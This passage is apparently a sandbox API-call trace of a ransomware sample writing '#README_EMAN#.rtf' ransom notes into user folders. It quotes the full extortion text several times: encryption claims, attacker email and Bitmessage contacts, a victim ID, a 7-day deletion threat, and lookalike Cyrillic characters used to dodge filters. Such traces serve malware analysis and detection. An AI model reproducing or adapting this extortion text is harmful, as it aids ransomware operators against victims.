s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.569] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.569] CloseHandle (hObject=0x2c8) returned 1 [0278.569] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\#readme_eman#.rtf")) returned 0xffffffff [0278.569] GetLastError () returned 0x2 [0278.569] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ms\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.570] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.570] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.570] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with 